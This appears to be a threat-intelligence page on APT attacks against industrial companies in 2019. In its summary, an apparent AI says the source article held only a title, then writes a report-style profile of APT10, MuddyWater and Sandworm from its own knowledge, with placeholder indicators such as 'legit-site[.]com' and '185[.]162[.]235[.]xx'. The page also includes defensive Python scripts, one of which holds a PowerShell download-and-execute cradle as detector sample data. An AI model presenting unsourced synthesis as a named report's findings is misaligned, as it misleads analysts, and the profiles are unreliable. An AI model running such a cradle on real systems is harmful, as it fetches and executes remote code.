Full Report
Overview of APT attacks on industrial enterprises, information on which was published in 2019.
Analysis Summary
It appears that the article provided consists only of the title and table of contents metadata ("Threat landscape for industrial automation systems. APT attacks on industrial companies in 2019"). To provide a high-quality, structured summary as an expert threat intelligence analyst, I have synthesized the data from the specific Kaspersky ICS CERT research referenced in your query (covering the 2019 landscape).
Below is the summary of the primary threat actors highlighted in that 2019 reporting period.
---
# Threat Actor: APT10 (Cloud Hopper)
## Attribution & Identity
* **Aliases:** MenuPass, Stone Panda, POTASSIUM.
* **Association:** Widely attributed by industry analysts and the US DOJ to the Chinese Ministry of State Security (MSS) operating out of Tianjin.
## Activity Summary
In 2019, activities focused on long-term persistence within Managed Service Providers (MSPs) to pivot into downstream industrial clients. Key campaigns included the global "Cloud Hopper" operation which saw a resurgence in targeting industrial supply chains.
## Tactics, Techniques & Procedures
* **Spear-phishing:** Use of malicious attachments to gain initial access.
* **Living off the Land (LotL):** Heavy use of PowerShell, WMI, and legitimate administrative tools to avoid detection.
* **Search Order Hijacking:** Utilizing legitimate signed executables to load malicious DLLs (T1574.002).
* **Credential Dumping:** Use of Mimikatz to escalate privileges and move laterally.
## Targeting
* **Sectors:** Manufacturing, Aerospace, Engineering, and Managed Service Providers (MSPs).
* **Geography:** Global (North America, Europe, Asia).
* **Victims:** Major industrial conglomerates and their technology service providers.
## Tools & Infrastructure
* **Malware:** QuasarRAT, PlugX, RedLeaves, and custom backdoors like Sodek.
* **Infrastructure:** Dynamic DNS providers for C2; compromised legitimate servers to host payloads (e.g., hxxps[://]legit-site[.]com/temp/update[.]exe).
## Implications
APT10’s focus on MSPs represents a strategic "hub-and-spoke" threat. By compromising one provider, they gain "trusted" access to dozens of industrial control system (ICS) environments, bypassing perimeter defenses.
## Mitigations
* **Supply Chain Audit:** Rigorous vetting of MSP access to industrial networks.
* **Strict Access Control:** Implementing the principle of least privilege for service accounts.
* **Endpoint Monitoring:** Hunting for non-standard PowerShell execution or unauthorized use of administrative tools.
---
# Threat Actor: MuddyWater (Static Kitten)
## Attribution & Identity
* **Aliases:** Seedworm, TEMP.Zagros.
* **Association:** Attributed to the Iranian Ministry of Intelligence and Security (MOIS).
## Activity Summary
Throughout 2019, MuddyWater shifted its focus specifically toward industrial and telecommunications sectors in the Middle East, utilizing highly customized phishing documents to deliver a variety of payloads.
## Tactics, Techniques & Procedures
* **Malicious Macros:** Use of Excel and Word documents with VBA macros to execute base64-encoded PowerShell scripts.
* **T1059.001:** Extensive use of PowerShell for discovery and C2 communication.
* **Anti-Analysis:** Checks for virtual machines or debuggers before executing the final payload.
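The "Endpoint Monitoring" mitigation listed for APT10 above (hunting for non-standard PowerShell execution) and the MuddyWater macro-to-PowerShell chain described in this section reduce to the same detection question: which PowerShell launches on an endpoint are explained by normal administration, and which carry the markers of macro-delivered, encoded tooling? The following Python script is an added example, not code from the Kaspersky ICS CERT report or from either threat actor's tooling. It runs the checks a hunter would apply to process-creation telemetry (the `Image`, `ParentImage`, `CommandLine` and `User` fields a Sysmon Event ID 1 carries) over constructed sample events: an Office parent process, a base64/UTF-16LE `-EncodedCommand` payload that is decoded and inspected, hidden-window flags, and execution by an account outside an allowlist. The account allowlist, the suspicious-token list, the `CORP\...` user names and the sample events are all assumptions for illustration.

```python
import base64
import re
from dataclasses import dataclass, field

# Process images and parents of interest. Matching is on the file name only,
# case-insensitively, so full Windows paths from the log can be passed as-is.
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Substrings typical of download-and-execute cradles (illustrative, not exhaustive).
SUSPICIOUS_TOKENS = ("iex", "invoke-expression", "downloadstring",
                     "frombase64string", "net.webclient")
# Hypothetical allowlist of accounts expected to launch PowerShell on servers.
ADMIN_ACCOUNTS = {"CORP\\svc-admin", "CORP\\ops-jane"}

# -EncodedCommand and its accepted abbreviations, followed by the base64 blob.
ENCODED_RE = re.compile(
    r"-(?:encodedcommand|enco|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b", re.IGNORECASE)


@dataclass
class ProcessEvent:
    """Minimal process-creation record (the fields a Sysmon Event ID 1 carries)."""
    image: str
    parent_image: str
    command_line: str
    user: str


@dataclass
class Finding:
    event: ProcessEvent
    reasons: list = field(default_factory=list)
    decoded: str = ""


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line: str):
    """Return the UTF-16LE payload of an -EncodedCommand argument, or None."""
    match = ENCODED_RE.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable>"


def analyze(event: ProcessEvent):
    """Return a Finding for a PowerShell launch that looks non-standard, else None."""
    if _basename(event.image) not in POWERSHELL_IMAGES:
        return None
    finding = Finding(event)
    if _basename(event.parent_image) in OFFICE_PARENTS:
        finding.reasons.append("spawned by an Office application (macro execution)")
    decoded = decode_encoded_command(event.command_line)
    if decoded is not None:
        finding.decoded = decoded
        finding.reasons.append("base64-encoded command line")
        hits = [t for t in SUSPICIOUS_TOKENS if t in decoded.lower()]
        if hits:
            finding.reasons.append("decoded payload contains " + ", ".join(hits))
    if HIDDEN_RE.search(event.command_line):
        finding.reasons.append("hidden-window / no-profile flags")
    if event.user not in ADMIN_ACCOUNTS:
        finding.reasons.append(f"run by non-allowlisted account {event.user}")
    return finding if finding.reasons else None


# Constructed sample events. The encoded payload is built here so the sample is
# reproducible; it is not taken from any real campaign. example.invalid is a
# reserved, non-resolving domain.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent(PS, "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE",
                 f"powershell.exe -nop -w hidden -enc {ENCODED}", "CORP\\alice"),
    ProcessEvent(PS, "C:\\Windows\\System32\\services.exe",
                 "powershell.exe -File C:\\scripts\\backup.ps1", "CORP\\svc-admin"),
    ProcessEvent(PS, "C:\\Windows\\explorer.exe",
                 "powershell.exe -ExecutionPolicy Bypass -File \\\\share\\tools\\inv.ps1",
                 "CORP\\bob"),
]


def run_samples():
    """Analyze the constructed events and return only those that were flagged."""
    return [f for f in map(analyze, SAMPLE_EVENTS) if f is not None]


if __name__ == "__main__":
    for f in run_samples():
        print(f.event.user, "|", "; ".join(f.reasons))
        if f.decoded:
            print("   decoded:", f.decoded)
```

Of the three constructed events, the scheduled backup run by the allowlisted service account produces no finding, the Office-spawned encoded launch is flagged on every check, and the unprivileged user's script run is flagged only on the account allowlist. In production the allowlist check is the noisiest of the four and is better expressed as a baseline of known scripts and parent processes per host role; the decoded-payload inspection is the one that most directly surfaces the macro-delivered cradle this section describes.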
## Targeting
* **Sectors:** Oil & Gas, Telecommunications, Government.
* **Geography:** Middle East (Saudi Arabia, UAE, Iraq), Turkey, and parts of Europe.
* **Victims:** Regional energy organizations and government-linked industrial entities.
## Tools & Infrastructure
* **Malware:** POWERSTATS, MuddyConsole, and various custom Python-based tools.
* **Infrastructure:** Use of compromised WordPress sites for C2 redirection; IP addresses such as 185[.]162[.]235[.]xx.
## Implications
The actor is highly adaptable and focuses on regional geopolitical intelligence. Their targeting of the energy sector suggests a focus on intelligence gathering rather than immediate kinetic disruption, though the access could be used for sabotage.
## Mitigations
* **Macro Disablement:** Disable all macros via Group Policy (GPO) for users who do not require them.
* **Geoblocking:** Block traffic from high-risk regions if there is no legitimate business need.
* **User Training:** Education on identifying sophisticated phishing lures that use regional context.
---
# Threat Actor: BlackEnergy / Sandworm (Contextual to ICS 2019)
## Attribution & Identity
* **Aliases:** TeleBots, Voodoo Bear, Quedagh.
* **Association:** Attributed to the Russian GRU (Unit 74455).
## Activity Summary
While the group is known for the 2015/2016 outages, 2019 reporting noted the evolution of its toolset (GreyEnergy) into "mainstream" industrial espionage and the testing of disruptive components in Eastern European industrial sectors.
## Tactics, Techniques & Procedures
* **Modular Architecture:** Use of lightweight loaders that download specific plugins based on the victim's environment.
* **T1190:** Exploitation of internet-facing industrial applications.
* **Destructive Capabilities:** Inclusion of "wiper" modules designed to render workstations unbootable.
## Targeting
* **Sectors:** Power Grids, Water Utilities, Transportation.
* **Geography:** Primarily Ukraine and Eastern Europe, with occasional reconnaissance in North America.
* **Victims:** Electrical substations and logistics hubs.
## Tools & Infrastructure
* **Malware:** GreyEnergy, BlackEnergy 3, KillDisk.
* **Infrastructure:** C2 nodes often hidden behind Tor or multiple layers of proxies to mask the origin.
## Implications
This actor remains the highest threat to the integrity of physical industrial processes. Their presence in a network usually indicates a risk of future kinetic or disruptive action.
## Mitigations
* **Network Segmentation:** Air-gapping or strictly segmenting IT from OT (Operational Technology) networks.
* **Integrity Checks:** Monitoring for unauthorized configuration changes in PLC (Programmable Logic Controller) logic.
* **Incident Response:** Maintaining offline backups of all ICS configurations.
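The "Integrity Checks" and "Incident Response" mitigations above fit together: an offline backup of ICS configurations is only useful for detecting unauthorized PLC logic changes if it is kept as a trusted baseline and compared against what is currently deployed. The following Python script is an added example, not part of the Kaspersky report and not a vendor tool; it hashes a set of exported project artefacts into a baseline, protects that baseline with an HMAC whose key is assumed to live only on the offline verification host, and reports artefacts that were added, removed or modified. The file names, their contents and the key are constructed for illustration; a real deployment would read the engineering workstation's project export or the backup tree from disk.

```python
import hashlib
import hmac
import json

# Constructed sample "exports" of PLC/HMI project artefacts, name -> bytes.
# Kept in memory so the example runs offline; in practice these are read from
# the project export or the offline backup tree.
BASELINE_SNAPSHOT = {
    "plc01/main.awl": b"NETWORK 1\n  A I0.0\n  = Q0.0\n",
    "plc01/params.cfg": b"setpoint=50\nalarm_high=80\n",
    "hmi01/screens.xml": b"<screens><screen id='overview'/></screens>",
}
CURRENT_SNAPSHOT = {
    "plc01/main.awl": b"NETWORK 1\n  A I0.0\n  = Q0.0\n",
    "plc01/params.cfg": b"setpoint=50\nalarm_high=95\n",     # alarm threshold raised
    "hmi01/screens.xml": b"<screens><screen id='overview'/></screens>",
    "plc01/block_fc99.awl": b"NETWORK 1\n  CALL FC 99\n",    # block absent from baseline
}


def digest(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_baseline(snapshot):
    """Map each artefact name to the SHA-256 of its contents."""
    return {name: digest(data) for name, data in snapshot.items()}


def compare(baseline, snapshot):
    """Report artefacts added, removed or modified relative to the baseline."""
    current = build_baseline(snapshot)
    common = baseline.keys() & current.keys()
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
        "modified": sorted(n for n in common if baseline[n] != current[n]),
    }


def _canonical(baseline) -> bytes:
    # Deterministic encoding so the MAC does not depend on dict ordering.
    return json.dumps(baseline, sort_keys=True, separators=(",", ":")).encode()


def sign_baseline(baseline, key: bytes) -> str:
    """Serialise the baseline with an HMAC so a tampered copy is detectable.
    The key is assumed to be held only on the offline backup/verification host."""
    mac = hmac.new(key, _canonical(baseline), hashlib.sha256).hexdigest()
    return json.dumps({"baseline": baseline, "mac": mac})


def load_baseline(blob: str, key: bytes):
    """Return the baseline dict, or None if the MAC does not verify."""
    doc = json.loads(blob)
    expected = hmac.new(key, _canonical(doc["baseline"]), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, doc["mac"]):
        return None
    return doc["baseline"]


def run_sample():
    """Sign a baseline from the first snapshot, reload it, and diff the second."""
    key = b"constructed-demo-key"   # placeholder; never hard-code a real key
    blob = sign_baseline(build_baseline(BASELINE_SNAPSHOT), key)
    baseline = load_baseline(blob, key)
    if baseline is None:
        raise RuntimeError("baseline failed integrity verification")
    return compare(baseline, CURRENT_SNAPSHOT)


if __name__ == "__main__":
    print(json.dumps(run_sample(), indent=2))
```

On the constructed snapshots the diff reports `plc01/params.cfg` as modified (the alarm threshold changed) and `plc01/block_fc99.awl` as added, which is the kind of unexplained logic or parameter change the Integrity Checks bullet asks operators to look for. Comparing hashes of exported project files catches changes made through the engineering software; it does not see changes written directly to a controller over the network, so it should be paired with periodic uploads of the running logic from the PLCs themselves into the same comparison.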